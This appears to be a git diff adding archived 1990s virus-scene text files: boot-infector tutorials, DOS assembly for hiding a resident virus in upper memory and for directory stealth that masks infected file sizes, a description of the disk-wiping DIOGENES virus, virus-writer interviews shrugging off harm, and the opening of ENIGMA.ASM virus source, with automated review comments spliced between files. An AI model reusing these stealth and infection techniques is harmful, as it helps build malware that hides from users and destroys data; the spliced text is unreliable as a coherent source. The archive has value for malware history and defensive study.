SS:SP is undefined, so most boot infectors set it to 0:7C00, which +causes the stack to be placed just below the loading area. This is sufficient +for the needs of most viruses. + Additionally, it would be nice to be able to locate empty space to store +the original boot sector or partition table. Here, the virus has a number of +choices. In hard disks, many viruses store the original partition table in the +unused space between the partition table and the first partition. The first +partition generally starts at triple (2,1,0) or later (some start as late as +(2,0,1), so there is a wealth of space in which to store the virus in that +area. A simple calculation reveals that there are (number of cylinders - 2) +sectors between (1,0,0) where the partition table is and (2,1,0) where the +first partition starts). Multiply that value by 512 and you have the number of +bytes you can store there. That's a large chunk of space you have at your +disposal. A virus may also store itself at the end of the root directory, +although it risks overwriting valid directory entries. The BPB contains +everything necessary to calculate the location and length of the root +directory. + An alternate approach, which is used by several viruses, is to alter the +file allocation table, or FAT. The FAT is an array of entries which describe +how the blocks on the disk are related. FAT entries are either 12 or 16 bits +long, depending on the disk. 12 bit FAT's are generally used in disks and +partitions with less than 20740 sectors and 16 bit FAT's are used in larger +disks and partitions. The location and size of the FAT can be found in the +BPB. Each entry in the FAT corresponds to a block on the disk. The FAT +describes a file's placement on the disk. By following the chain, you can find +the location of the blocks of the file, since they need not be contiguous. The +value of the FAT entry is the number of the next block in the chain, i.e. 
an +index to the FAT entry corresponding to the next block of the file, unless it +is one of the special values. If the value of the FAT entry is 0, then the +block is unused. If the value is -1 to -8 (FFF8-FFFF) then the block is the +last block in a file. If the value is -9 to -10h (FFF0-FFF7) then the block is +reserved (usually a bad block). The first and second entries in the FAT are +always -1. The third entry governs the first data area. The idea is for the +virus to find empty blocks, mark them as bad in the FAT, and store the code +there. This way, DOS thinks the blocks are bad and does not overwrite the +virus. + One important issue with partition table infectors is whether they should +preserve the partition table itself, i.e. leave the partition table structure +at offset 1BE in the first block of the disk. Similarly, should boot sector +infectors retain the BPB? This is a particularly interesting issue with +stealth viruses, viruses which redirect attempts at accessing the partition +table or boot sector. The advantage of retaining the structures is that DOS +will recognize the disks even when the virus is not loaded in memory. +Therefore, the virus is somewhat less vulnerable to detection. However, if the +virus does not keep the structure, then it will be more difficult for the user +to boot the computer without loading the virus in memory, since DOS will not +recognise the drive. This is an especially nifty feature, since primitive +cleaning attempts such as FDISK /MBR will fail against such a virus. + Within this motley assortment of information, you will find enough to aid +you in crafting an original boot infector. There is intentionally no code in +this tutorial, mainly because there is little virus-specific information +contained within. Many of the routines used in a boot infector are important +when writing any boot sector, so there is little importance in repeating the +code here. 
diff --git a/textfiles.com/virus/datut010.txt b/textfiles.com/virus/datut010.txt new file mode 100644 index 00000000..0564e9ff --- /dev/null +++ b/textfiles.com/virus/datut010.txt 
@@ -0,0 +1,115 @@ + + + UMB Residency + + By Dark Angel + Phalcon/Skism + + +One day, while fiddling with loading programs into MSDOS UMB's, I realised +that there are very few viruses that used UMB's. This is surprising, given +the prevalence of UMB's and the ease with which DOS viruses may hide their +presence through the use of UMB's. + +The UMB's, or upper memory blocks, consist of the memory above 640K and below +1MB (segments A000 to FFFF). This region was reserved early on for BIOS and +peripherals, notably video memory. There is normally plenty of unused space in +this region, so enterprising programmers found a simple way to incorporate the +memory into DOS's memory allocation scheme. They simply extended the MCB chain +into that region, with MCB's indicating already allocated memory covering the +memory used for other purposes by the machine. In this way, more memory, +albeit fragmented, was usable for loading programs. The UMB's are especially +handy for storing TSR's, since they have smaller memory constraints than most +programs. The programmers at Microsoft, realising the utility of UMB's, +decided to incorporate UMB's into DOS beginning at version 5, so now there is +a standardised method of handling upper memory. + +The MCB's handling upper memory are slightly more complex than regular MCB's. +The format of a UMB control block is: + +Offset Size Description + 00 BYTE 'Z' if last MCB in chain, 'M' otherwise + 01 WORD PSP segment of owner (8 if MSDOS, 0 if free) + 03 WORD size of memory block in paragraphs + 05 3 BYTES unused + 08 8 BYTES program name in ASCII or + "SC" if system code or + "SD" if system data + +The method is pretty simple to understand and very easy to implement. In +DOS 5+, the first UMB can be located through a pointer in the disk buffer +information structure which, in turn, may be located through the DOS master +list structure. This UMB is usually located at 9FFF:0000, but there is no need +for this to be the case. 
It's simply the most convenient location for it. The +only difference between modifying regular MCB's and UMB's is the extra field +at offset 8 which may be used to mark the block as DOS system code. By marking +this with DOS's usual fields to indicate unusuable memory such as video memory +and ROM, we effectively hide the virus from detection by utilities such as +MEM. Since it doesn't reside in conventional memory (below 640K), there is no +decrease in memory a la 40:13 BIOS manipulating memory residency techniques. + +The sample code below, written for a simple COM infector, illustrates the +technique. + +start: xor di,di + + mov ax,3306 ; get true DOS version + int 21 + inc al ; DOS 4-? + jz no_UMBs ; if so, we don't have UMB's + + mov ah,52 ; get DOS master list + int 21 ; structure + + lds si,es:[bx+12] ; get ptr to disk buffer info + + mov ax,ds:[si+1f] ; get address of the first UMB + inc ax ; (FFFF if no UMBs present) + jz no_UMBs + dec ax ; undo damage from above +search_chain: mov ds,ax ; go to the MCB + cmp word ptr [di+1],di ; unused? + jnz search_next + cmp word ptr [di+3],reslength_P ; MCB large enough to + ja handle_MCB ; hold us and our MCB? +search_next: cmp byte ptr [di],'Z' ; end of chain? + jz no_UMBs + mov bx,[di+3] ; go to the next MCB + inc ax ; 40Hex + add ax,bx + jmp search_chain + +no_UMBs: mov ax,cs + dec ax ; get the MCB for current + mov ds,ax ; program + cmp word ptr [di+3],reslength_P + 1000 ; large enough for + jna fail_init ; program and virus and its + ; MCB? 
+ jmp short handle_MCB + + db 0,'(DA/PS)',0 + +handle_MCB: sub word ptr [di+3],reslength_P + 1 ; adjust size of memory + ; area for virus + its MCB + mov bx,[di+3] ; get size of new memory area + mov cl,'M' ; make sure this MCB doesn't + xchg cl,byte ptr [di] ; mark the end of the chain + inc ax + add ax,bx ; go to virus segment's MCB + mov ds,ax + mov es,ax + + mov byte ptr [di],cl ; patch end of chain indicator + mov word ptr [di+1],8 ; mark MCB owned by DOS + mov word ptr [di+3],reslength_P ; patch in virus size + + inc ax ; ds->virus segment + mov ds,ax + + or di,8 ; go to program name field + mov ax,'CS' ; make virus invisible to MEM + stosw ; by pretending it is + xor ax,ax ; DOS system code + stosw + stosw + stosw diff --git a/textfiles.com/virus/desc.sdi b/textfiles.com/virus/desc.sdi new file mode 100644 index 00000000..3eaabf3d --- /dev/null +++ b/textfiles.com/virus/desc.sdi @@ -0,0 +1,12 @@ +Ŀ + + I L L E G A L I T Y + + THe uNSTOPPaBLe CRiMe MaCHiNe +Ĵ + IL-SMG03.ZIP +Ĵ + The SMEG Virus construction kit + Make your very own virus + (c) The Black Baron + diff --git a/textfiles.com/virus/deth001.rot b/textfiles.com/virus/deth001.rot new file mode 100644 index 00000000..79f0ee92 --- /dev/null +++ b/textfiles.com/virus/deth001.rot 
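Review bot: the high-bit characters in this hunk were mis-decoded before the files were committed (the `` run above `UMB Residency` in `datut010.txt`, and the `Ŀ` / `Ĵ` rows framing `I L L E G A L I T Y` in `desc.sdi`), which is what CP437 box-drawing looks like when read as Latin-1 or UTF-8. Either convert these files to UTF-8 once and deliberately so the frames render, or commit the original bytes and mark the `textfiles.com/virus/` tree in `.gitattributes` (for example `-text`, or `working-tree-encoding=cp437`) so the archive stays byte-for-byte faithful; doing neither, as here, means every later touch of these files shows spurious character churn.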
@@ -0,0 +1,82 @@ +******************************************************************************* +* * +* / Megadeth's Guide to Virus Researching \ * +* < Part I > * +* \ A .ROTing [DeTH] Text File / * +* * +******************************************************************************** + + + By: Megadeth + + I. What you need for virus Research + ^^ ^^^^ ^^^ ^^^^ ^^^ ^^^^^ ^^^^^^^^ + To do any research or testing on viruses it is wise to have the following: + + The Latest Version of VSUM + The Latest Version of F-Prot + Turbo Assembler (MASM will do though) + Central Point Backup + 40Hex Magazine, NukE Infojournals, And other virus publications + Dark Angel's Phunky Virus Writing Guide (for virus writting) + ASSIGN.EXE for MS-DOS 5.0 or SUBST.EXE for DR-DOS 6.0 + MIRROR.EXE - for use with trojans. + Norton Utilities + A Virus or Trojan + X-Tree Pro Gold, or other DOS Shell that lets you see and edit Hex + Code. + + + Virus Research is vary risky. You can learn alot about programing and +the behavior of viruses, but you can also trash your system if your not careful. +here is how to research a virus. + + ][. Researching a Virus + ^^^ ^^^^^^^^^^^ ^ ^^^^^ + The First thing you do with a file thatt you belive is infected with +a virus is you scan the program with F-Prot. It's good for picking out the +individual strains of viruses. Use the Secure Scan and then the Heretic Scan +if the virus is not ideentified. Then after you have the name of the virus +you can look it up in VSUM. If it's not scaned as a virus then look at the +virus Hex code with a Hex Viewer. Look for strings in the end of the infected +file. The are sometimes messages, text with the name and author of the virus, +a string like *.COM and/or *.EXE. The *.COM and *.EXE are the files it infects. +If you see *.COM and not *.EXE in the file then you know the file only infects +.COM files. 
If you got the virus from a virus board, then there are sometimes +text files written by the author on what the virus does. If you don't see any +strings in the virus then there is a good chance that the virus is encrypted. +You can also see when the virus does when actived. Run ASSIGN.EXE to make +all calls to your hard drives goto a virus test floppy. make sure you have +the virus and some *.COM and *.EXE files for the virus to infect. Then run the +program with the virus. If the virus infects files only when an infected file +is run, then you know that the virus is not residednt iin memory. If the virus +infects files everytime an unifected program is run then you know that the virus +is active in memory. Look for file size changes and changes in the file times. +If you ever see the Hard Drive Light go on turn off the computer right away. +don't use CTR-ALT-DEL as it might have been disactivated. After you think other +files on the disk are infected take out the virus test disk, then turn the +computer off. This is important since some viruses may llive through a CTR-ALT- +DEL. Then when your system is booted from the clean hard drive scan the files +again, and take a look at he hex code and compare them to the origonal +uninfected files. Format the disk when done. + That is a quick explination of how to research a virus. There are more +ways then this and they will be covered in future text files. Another tip +is to Regularly back up your system and keep multiple backups in case +a set of backups is infected. + + IV. In Future Files + ^^^ ^^ ^^^^^^ ^^^^^ + These are topics that will be covered in future text files: + + Researching Trojans. + Researching Boot Sector Viruses. + Recovery from a virus break out. + Tips on how to keep systems from getting infected. + Understanding the behavior of viruses. + Researching Virus Creators like VCL, PS-MPC, and G. + + I can be contacted on many boards in the 708 area code, including the +Hell Pit. 
Any suggestions would be vary helpful. Greets to PHALCON/SKISM, +[NukE], Dark Angel of PHALCON/SKISM and The Nowhere Man of [NukE], and the +Dark Avenger, who are, in my opinion, the most talented virus writer's around. +  \ No newline at end of file diff --git a/textfiles.com/virus/dhcivwar.txt b/textfiles.com/virus/dhcivwar.txt new file mode 100644 index 00000000..18936623 --- /dev/null +++ b/textfiles.com/virus/dhcivwar.txt 
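Review bot: `deth001.rot` ends with `\ No newline at end of file`, and its last line carries a stray `` byte after the greets, the same mis-decoded CP437 residue seen in the other files of this commit. If the intent is a verbatim archive, keep the byte but protect the encoding via `.gitattributes`; if the intent is readable text, strip the stray character and add the trailing newline now, so the next commit touching this file does not show a spurious last-line change.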
@@ -0,0 +1,67 @@ + +Relationchart of the Civil War and related viruses, (c) 1993 by TridenT. + +Below you find the relation chart of the Civil War based viruses. +This is the only correct relationchart, don't trust the +information you may find in VSUM, F-Prot etc. or the CARO naming +because they contains a lot of errors + +Greetings, DH / TridenT + +------------------------------------------------------------------------------ + +Civil War + | + +--> Civil War II v1.0 --> Proto-T --> Lockjaw Eins + | | | + | | +--> Lockjaw Zwei + | | | + | | +--> Lockjaw Drei + | | + | +--> Civil War II v1.1 --> Civil War III + | | + | +--> Civil War V + | + +--> Civil War IV v1.0 + | + +--> Civil War IV v1.1 + | + +-> Civil War IV v1.2 + | + +--> Civil War IV v1.3 + + + + +Original Name CARO Name +------------------------------------------------------------------------------ +Civil War Civil War +Civil War II v1.0 Proto-T.Civil_War_II +Civil War II v1.1 - +Civil War III - +Civil War IV v1.0 TPE_1_3.Civil_War.A +Civil War IV v1.1 TPE_1_3.Civil_War.B +Civil War IV v1.2 - +Civil War IV v1.3 - +Civil War V TPE_1_3.Civil_War.C +------------------------------------------------------------------------------ + + R C E P + -------- +Civil War . x . . +Civil War II v1.0 x x . . +Civil War II v1.1 x x . . +Civil War III x x x . +Civil War IV v1.0 . x . x +Civil War IV v1.1 . x . x +Civil War IV v1.1 . x . x +Civil War IV v1.2 . x . x +Civil War IV v1.3 . x . x +Civil War V x x . x + + +Code : R = Resident + C = Infect COM files + E = Infect EXE files + P = Polymorpic + diff --git a/textfiles.com/virus/dhinterv.iew b/textfiles.com/virus/dhinterv.iew new file mode 100644 index 00000000..b618f540 --- /dev/null +++ b/textfiles.com/virus/dhinterv.iew 
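Review bot: the R/C/E/P attribute table in `dhcivwar.txt` lists `Civil War IV v1.1` twice with identical flags, and the relation chart draws the `Civil War IV v1.2` branch with `+->` where every other branch uses `+-->`. Both are almost certainly upstream typos in the archived text rather than data, so the hunk should stay as-is, but record it in the commit message or an accompanying README so nobody later reads the duplicate row as a distinct variant.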
@@ -0,0 +1,250 @@ +-------------------------------------------------------------------------------- + INTERVIEW WITH DARK HELMET / TRIDENT / THE NETHERLANDS +-------------------------------------------------------------------------------- + + Give me a short description of who you are! + +- Well I'm male, 24 years old and I'm last year + student computer science. + + From where did you get your handle, Dark Helmet? + +- I got the name from a film of Mel Brooks called 'Spaceballs'. The + film itself is a parody on the Sciene Fiction films. + + When did you discovered the world of computers? +- I think I was about 10 years old when I got my first game computer + (a Philips ..., I forgot the name). Later when I was about 14, I + bought a C64 (great computer) then 4 years later I bought an Atari + 520 ST computer. And a couple years later a PC, which I still use + today. + + How long have you been active in the scene? + +- I think about a 2 years, about 6 months after I bought my PC. + +How did you came into the virus business? + +- I got involved with viruses at my school. At that time people didn't + know much about viruses and when the school got hit by a virus I + wanted to know more about these things. So I started to collect + viruses. Thats how I got in contact with who just + had started with a Hack/Phreak/Virus BBS. After just + collecting I tried to write my own virus. So I wrote my first virus + a overwriting non-resident virus of 44 bytes. It took me about 3 + hours to write it because I hadn't programmed in assembler before. + Most of knowledge I got from books that you can buy at you local + bookshop. + + Have you been involved in any other group than Trident? + +- Nope.. + + Who started/created Trident? + +- I think it was Tardy who started the group. He also came up with the + name TridenT. There where four members when the group started. John + Tardy, Peter Venkman, Bit Addict and Dark Helmet (me). The group was + founded in the summer of '92. 
+ + What's the groups goal? + +- To write viruses and to exchange idea's + + How many people are you? + +- don't know, I think 8 or 9. + + What's their handles? + +- Bit Addict + Dark Helmet + xxxxxxxxxxxxx (more censor!) + xxxxxxxxx (look above!!) + Masud Khafir + Crom Cruach + John Tardy + Dark Ray + NighBird??? (don't know this one) + + Do all of them program, if not, what's the others job? + +- most of them program, the others do other stuff like xxxxxxxxx who + xxx xxxxxxxxxxxxxxxxxxxxxxxxxx [This is getting too much censoring!] + + Who are the "leading/head-persons" in the group? + +- Well there isn't a leading/head person or something like that. + Everyone does the things he likes. + + How is Trident (currently) organzied? + +- Not...well loose, we do have regular meetings and so and we have a + internal network between the members. + + Have you got any contacts with other virus-groups/programmers? + +- There are some contacts with the other main viruswriting + groups in the virusworld. And there is also some sort + of contact with other virusprogrammers in the Netherland. + + Can anyone ask for membership, or are you a "private" group? + +- Everyone can join as long as he is willing to accept the rules + + What does it take to join up? + +- Stick with the rules : + no racism in viruses + no destructive viruses + if you can write a virus it will help... + +Have you ever thought of/are you currently releasing some sort of +electronic magazine (text/executable/hard-copy) + +- Yea, well we have discussed this idea a long time, but because of the + new laws in the netherland we didn't do it.... + + Are you into other things such as hacking and phreaking aswell, or + just viruses? + +- Well a the beginning I did a little bit of hacking aswell but I + stopped with that because the phone bills got to high + + Do you have some network-connection? + +- You can reach me at Nuke-net, adresses it to Dark Helmet and I will + read it ( I hope). 
+ + Can you name a few viruses/engines that members of Trident has + written? + +- TPE, Horns of Jericho, Crusher, Civil War, Gotcha, and so on... + + Which of them have you written yourself? + +- Civil war(s), Ritzen and some other + + Which one was the hardest to write? + +- None virus writing isn't that hard.. + + Do you have any sort of company or law-enforcement who are trying + to hunt Trident down? + +- Yea, the CRI, I think Tardy can you tell more about this. + + If so, are they a real threat or just "childish"? + +- No, they are a real threat to us... + + Have you ever had any trouble in the group with the result of kicked + member(s)? + +- Nope, because nobody is kicked out... + + How good are Trident comparing to other groups? + +- We are the best...( well at least we are in the top 3 ) + + Do you have any couriers that spread your products around? + +- No, I upload the creation to a Vx board and then it will spread itself + + What do you think about the laws against h/p/v that has arrived lately? + +- I here they are becoming a problem to us, because you have to be very + carefull that you don't break the law + + Would you feel guilty if one of your viruses made damage to a hospital? + +- I don't thinks so, because I don't feel responsible if someone else + start releasing viruses in the wild. As a matter of fact I think that + the most viruswriters don't spread there creation around in the wild. + I think that the whole virus problem is exaggerated by some anti-virus + people. + + Do you see any differences between the scene now and a couple of + years ago (concerning the underground part ofcause)? + +- Well its much more organized then a few years back, and there + is also more contact with the other groups and viruswriters. + and there are now much more people involved then + a few years back. + + Which virus-magazine do you think is the best avalible now-a-days? 
+ +- Crypt and 40Hex, I like Crypt for the news and 40hex for the news and + programming stuff + + Which virus-group/programmer do you admire/like? + +- No one..,I don't believe in that hero stuff andso.. + + Which country is the best virus-writing today? + +- Maybe Russia, don't know exactly... + + Which virus-group(s) do you think is the best? + +- I think Phalcon/Skism is very good. + + What do you think about these virus generators, such as VCL or PS-MPC? + IVP, NUKE-GV etc. etc.? + +- I'm working on my own virus generator now, that will generating + viruses the polymorphic way. It was planned to be ready last xmas, + but some things came up and I don't know when I finnish it yet. + + What do you think about the people using them? + +- Well I don't see the fun of using a virusconstructor and generate + a virus and spread it. I mean whats the point of it. Be orginal and + try to write your own virus. + + What do you think about people bragging over (almost) nothing and + ragging with other groups aswell? + +- ignore them... + + What do you think about such individes as board-crashers? + +- Depends on the reason for crashing the board. But if there is no + good reason I see it as pure vandalism. + + Describe the perfect virus : + +- I don't think there is suchs thing as a perfect virus, every virus + has some negative aspects.... + + Which AV-program do think is the best, and why? + +- F-Prot, it has a easy to use user-interface, and it has a good + detection rate of viruses. For students its free. + + What do you think about the underground's future? + +- I think there is no more real underground, I think is will more public + in the future. Next I believe that the underground will become more + organzied both in contact between each other as in more groups. + + Any advice to people who want's to learn the basic of virus-writing? + +- 1. Buy a good book. 
(I learned a lot of 'Advanced MS-DOS programming, + by Ray Duncan, second edition, Microsoft Press, Redmond WA, USA) + 2. Then get some real viruses and study them. + 3. Try to write a simple virus, like a overwriting one, or a simple + non-resident infector, then move up to resident ones and so on. + + Something else you wish to say? + + Sorry that I don't have more time to fill out all the question, and that + I didn't have time to remove all the spelling and grammar error. If you + have anything to ask, you can reach me xxxxxxxxxxxxxxxxxxxxxxxx + + Do you wish to send any greets? + +- Sure...Greetings to : + Alie, Anja, Claudine, Christine, Dyonne, Erik, Frank, Gertie, Jos, + Linda, Liesbeth, Marile, Marcel M., Marcel T., Mildred, Mike, + Norbert, Peter, Ralph, Roger C., Roger H., Victoir \ No newline at end of file diff --git a/textfiles.com/virus/diogenesdoc.vir b/textfiles.com/virus/diogenesdoc.vir new file mode 100644 index 00000000..544df0a6 --- /dev/null +++ b/textfiles.com/virus/diogenesdoc.vir 
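Review bot: `dhinterv.iew` also ends with `\ No newline at end of file`, while `dhcivwar.txt` and `diogenesdoc.vir` in the same commit end with trailing blank lines. Pick one convention for these text archives, either add the final newline everywhere or preserve every file verbatim, and apply it consistently so the tree does not mix both.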
@@ -0,0 +1,59 @@ +DIOGENES 2.0 DOCUMENTATION & USER NOTES + +DIOGENES is a destructive VCL 1.0 variant that was not created directly +with Nowhere Man's Virus Creation Laboratory, but rather began life as a +first generation descendant of Urnst Kouch's DIARRHEA 4. You'll remember +DIARRHEA 4 from a previous Crypt Newsletter -- it's the tenuous little .COM +infector that displays a colorful "Eat My Diarrhea" ANSI on Fridays. +The Crypt newsletter's magnanimous distribution of such well-commented +source codes as those churned out by VCL 1.0 is of course a boon to +potential virus authors. + +DIOGENES is an appending, encrypted .COM infector. When it can find no +more .COMs to infect within the current directory, it will search the system +path for them. COMMAND.COM is a viable target, but its infection will not +crash the system. Infected files become dangerous time bombs -- execution +on the 31st of any month will trigger an overwrite of the C: drive, starting +with sector 1 and continuing through 718. This will eradicate the FAT and +the root directory, as well as whatever other data happens to lie within +those sectors. The overwrite consists of a message written to the disk +over and over. This cheery missive is also displayed to the screen +once before the user is returned politely to the DOS prompt, undoubtedly +leaving the victim with a warm feeling inside that will make him forget all +about his lost data. Diogenes' greeting is as follows: + + +"DIOGENES 2.0 has visited your hard drive..... + + This has been another fine product of the Lehigh Valley. + Watch (out) for future 'upgrades'. + + The world's deceit has raped my soul. We melt the plastic + people down, then we melt their plastic town....." + + +The second line of the message is in homage to the Lehigh Virus. The last +two lines are taken from the song 'Plastic Town' by Powermad. The message +is not visible within the encrypted virus. 
+ +As a token of the author's mercy and benevolence, the affected system can +still be rebooted off the C: drive following its Diogenization. However, +recovery of data (that which hasn't been overwritten, that is,) will be a +major undertaking under most circumstances. (Seeker is too kind. The routine +which overwrites your data is thorough. Affected disks are a nightmare +for even powerful tools like Mace Utilities and Norton. Only a masochist +would spend more than 5 minutes checking the disk before wiping it. -URNST) +Additionally, any recovered .COMs would still be infected. + +DIOGENES is not scannable by SCAN 95b, with its vaunted ability to spot any +VCL product. Face it -- with a little patience and experimentation, any +viral source code can be altered in such a way as to render the assembled +virus unrecognizable to any given scan-string scanner. Far from being +obsolete, Nowhere Man's VCL, with its generously commented source codes so +valuable and inviting as both raw material and learning aid to the potential +new virus author, has in fact given such scanners a hearty shove towards +their rapidly approaching demise. + +--SEEKER + + diff --git a/textfiles.com/virus/dirstlth.txt b/textfiles.com/virus/dirstlth.txt new file mode 100644 index 00000000..6c251038 --- /dev/null +++ b/textfiles.com/virus/dirstlth.txt 
@@ -0,0 +1,129 @@ +Directory Stealth (FCB) +----------------------------------------------------------------------------- + +Nowadays, a virus needs to use some kind of stealth technique in order to be +effective. Memory stealth is something obviously needed in a virus, but in +this article we'll discuss another stealth method, simple and easy to put +into practice. + +It's a problem, these days. Users are informed about viruses and everyone is +astonished, imagining all these little bugs are getting into their machines. +When a user sees his files start to grow for no apparent reason, he knows +something strange is happening. And that strange 'thing' is almost certainly +a virus. + +The technique we'll discuss in this article was developed precisely to avoid +just this situation: Directory Stealth. We use this technique so that when +the user views his directory, he can't see the increase in file size which +results from a virus infection. + +When the user types DIR, DOS functions 11h and 12h are called. What we'll do +is to intercept these calls from our Int 21 handler. + +Before going on, we need to talk about FCB (File control Block). This is a +table which DOS uses to work with files: open, close, etc. etc. There are 2 +types of FCBs. One is NORMAL... Its format is as follows: + +offset Size Description +----------------------------------------------------------------------------- +00h 1 Drive (00=actual, 01=A:, 02=B:, 03=C: etc.) +01h 8 File name. Space filled if less than 8 characters. +09h 3 File extension. +0Ch 2 Actual Block. Points to the register block. +0Eh 2 Register size. +10h 4 File size in bytes. +14h 2 Date. +16h 2 Time. +18h 4 Reserved (MS doesn't tell us what it's used for) ;) +1Ch 4 Equal to offset 10h, but that's the default value. +20h 1 Offset from actual register. +21h 4 Relative register. 
+ +There's also an EXTENDED FCB which is the same as the NORMAL FCB, except that +there are 7 additional bytes added to the beginning (before offset 0h of the +NORMAL FCB) + +Offset Size Description +----------------------------------------------------------------------------- +-07h 1 contains the value 0FFh, which indicates its an extended + FCB. +-06h 5 Reserved +-01h 1 Byte Attribute + +When we ask for the DIR, Int 21 functions 11h & 12h are executed and the +system searches for the files based on the contents of the FCB. If the +function ends satisfactorily, the contents of the FCB are copied to the DTA. +What we are going to do is to edit the data copied to the DTA. + +First, we add the code which will intercept the Int 21 11h and 12h functions: + +Handler_21: + .. + .. + cmp ah,11h ; Did the user ask for a directory? + je D_stealth ; invoke stealth + cmp ah,12h ; Did the user ask for a directory? + je D_stealth ; invoke stealth + .. + .. + +Let's go straight to the stealth code. First we'll call the original Int 21 +so the DTA is filled with the file data. + +D_Stealth: + pushf ; we simulate an + call dword ptr cs:[Old21] ; int 21h + or al,al ; if AL=0 then all OK. + jnz ERROR ; ag, there's been an error. ;) + + +What we do next is to obtain the DTA address so we can modify the data. + + push ax bx es ; We store the registers we're using + mov ah,2fh ; The DTA address is returned in + int 21h ; ES:BX + +Now we must determine whether it's an extended or normal FCB, since the +offsets will be different. So we see if the first byte is 0FFh: if it is, +it's extended. Otherwise it's normal. :) If it's extended, we'll add 7 +bytes to its address. These are of no use to us so we'll skip them so as to +get to the first datum the two (extended and normal) have in common. + + cmp byte ptr es:[BX],0ffh ; Is the first byte FF? 
+ jne normal ; no, then it's a normal FCB + add bx,7h ; If EXTENDED, add 7 bytes + +Next, we must see if the file is infected, since if it is, we're not +interested in fixing anything. For this we assume that we've marked infected +files by setting the seconds to 60, an impossible value. + +normal: mov ax,es:[bx+17h] ; We take the file's time from the + and ax,1fh ; FCB and we check the seconds. + xor al,1eh ; Do the seconds = 60? + ; 1eh = 30 decimal, 30*2 = 60 sec. + ; XOR = CMP, but quicker and better. + jne no_infectado ; not 60 = not infected.. + +The following code is executed ONLY if the file is infected. We subtract the +size of the virus from the file size in order to obtain the original file +size.. + + sub word ptr es:[bx+1dh],VIRLEN ; Subtract virus size. + sbb word ptr es:[bx+1fh],0 + +Done! Now we restore the registers we used and return from the int. + +no_infectado: pop es bx ax ; restore the registers +error: iret ; return.. + +There we are. It's really very easy and worthy of being included in a virus. +The code is minimal and its services are truly useful.. + +Well, we've covered Directory Stealth, using the FCB. But there is another +type of stealth, using HANDLE, which is the method used by Norton Commander, +PCTools and similar programs to look at files. This method is much easier to +use than FCB. In a forthcoming article we'll cover this method, which is +practically the same as FCB. + + - WM - + diff --git a/textfiles.com/virus/drkfib01.txt b/textfiles.com/virus/drkfib01.txt new file mode 100644 index 00000000..07ab8e95 --- /dev/null +++ b/textfiles.com/virus/drkfib01.txt 
@@ -0,0 +1,62 @@ + Virus Writers Reply + + Personally we [Australian Parasite and me] think the Aussie virus scene + is in an OK kind of state at the moment. There are not many of us here + that write viruses, and some are just lammers rehashing other people's + work. We never really could understand the paranoia that surrounds them. + It's just a little piece of code, but to see the faces of people when they + say "Oh my God, I've got a virus, I'll have to reformat my 600Gb hard + disk" is great. + It's unbeleivable how badly people react. It separates the men/women + from the boys/girls. The easiest way to remove a virus is to get one of + the virus writers to write you an antidote. It's very simple and + painless. All it takes is a copy of the virus to analyse. + We'd also like to blow away the myth of "pirates get what they + deserve". Viruses are less likely to travel on pirated games than the + shareware stuff from bulletin board systems. Why ? Because most of the + sysops who run underground boards aren't morons. How often do you hear + about people getting hit by pirated games compared to trojan shareware + utilities ? The exception to this was when Nuke worked their way through + INC and THG. Look at the amount of trojans around now. They are mostly + shareware stuff: few, if any, are games. + Of course the Anti-Virus folk benefit. We don't get any money from + doing this but they do. They live off us. And don't say that if there + were no viruses there would be no anti-virus programmers. If the anti's + stopped updating scanners then we (the Australian Institute if Hackers) + would consider this victory and cease to write them. This one of the + reasons why we create viruses. To create, mutate, live, travel and + experience. Stephen W. Hawkins defends our actions: in his eyes we create + artificial life forms. And that comes from a highly regarded scientist. + Pam Keanes' comments that viruses could not be the work of kids + bewilders me. 
I learnt assembler when I was 15. Writing a virus is a + very easy thing to do. A simple memory resident, non-overwriting COM + infector would take 10 mintues to write from scratch. Stealth is also + a pretty easy thing to develop. It's like writing a cheat mode - you only + have to trap and monitor. + Dark Avenger's MTE is good, but no virus writer worth their salt + willingly uses other peoples code: only lammers do this. Studying it + and modifying it severely is another matter altogether, and is not seen + as an act of 'lammerism'. + In our expert opinion we think Scan 2.0 is the best detection + program -- here's ou quick rundown. + + Scan 2.0: Quick, scans more than any other and cleans pretty good too. + Easier to trojanise than the old style Scan. + + Vbuster: Not too bad. A nice range of utilities most people will never + use. Detects quite a few, and cleans a couple. + + VET: Too few options, and kludgy to use. Does not scan many at all. + + Norton: Nice menu system, but too expensive and does not detect as many + as Scan 2. + + MS Anti-Virus: Wouldn't trust this as far as we could throw it. CPAV + was bad, but this cut-down version is dire. Finds few, cleans even less + and too much hassle to update. + + Thunderbyte: We hate it! + + 'DARK FIBER' + Australian Institute of Hackers + diff --git a/textfiles.com/virus/enigma.asm b/textfiles.com/virus/enigma.asm new file mode 100644 index 00000000..67a362cf --- /dev/null +++ b/textfiles.com/virus/enigma.asm 
@@ -0,0 +1,1129 @@ +.MODEL SMALL +.CODE + +comment / + Good luck! + + Vladimir Botchev, CICT-BAS, december 1988 + + / + +data_area struc ;Define a pattern for working data + ;area +DS_save dw ? +ES_save dw ? +IP_save dw ? +CS_save dw ? +SS_save dw ? +filematch db '*.exe',00h ;Names for files to infect +matchall db '*.*',00h ;needed for the matching procedure +infected dw 00h ;A very useful flag +help_flag dw 00h ;These two flags are needed to +where_from_flag dw 00h ;determine if virus is free running + ;or from an infected program + ;therefore it's very important + ;that where_from_flag value + ;is set to zero at assembly time +handle dw ? +ip_old dw ? ;old instruction pointer +cs_old dw ? ;old value of code segment +ss_old dw ? +far_push dw ? +save_push dw ? +buffer1 db '\',63 dup (?) +virus_stamp db 'motherfucker' ;Very hard to obtain in + ;a random way + +buffer2 db 2b0h dup (?) +new_area db 64 dup (?) +new_data db 64 dup (?) +pointer1 dw ? +pointer2 dw ? +pointer3 dw ? +pointer4 dw ? +pointer5 dw ? +pointer6 dw ? +pointer7 dw ? +pointer8 dw ? 
